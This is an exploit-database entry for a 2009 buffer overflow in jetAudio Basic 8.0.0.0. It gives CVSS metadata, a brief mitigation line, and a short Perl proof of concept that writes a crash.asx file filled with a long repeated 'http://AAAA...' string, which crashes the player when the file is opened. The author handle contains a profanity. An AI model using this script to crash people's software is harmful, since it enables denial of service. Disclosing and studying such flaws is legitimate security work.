header-logo
Suggest Exploit
vendor:
JetAudio Basic
by:
D3V!L FUCKER
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: JetAudio Basic
Affected Version From: 8.0.0.0
Affected Version To: 8.0.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:jetaudio:jetaudio_basic
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista SP0
2009

Local Crash Poc

This exploit is a buffer overflow vulnerability in jetAudio v 8.0.0.0 Basic. The exploit is triggered by creating a malicious .asx file containing a long string of A's. When the file is opened, the application crashes.

Mitigation:

Input validation should be used to prevent buffer overflows.
Source

Exploit-DB raw data:

#!/user/bin/perl
# Exploit Title: [Local Crash Poc]
# Date: [Fri/Dec/25/2009]
# Author: [D3V!L FUCKER]
# Software Link: [http://www.jetaudio.com]
# Version: [jetAudio v 8.0.0.0 Basic]
# Tested on: [windows vista sp0]
# Code :
my $file= "crash.asx";

my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

print "Done..!~#\n";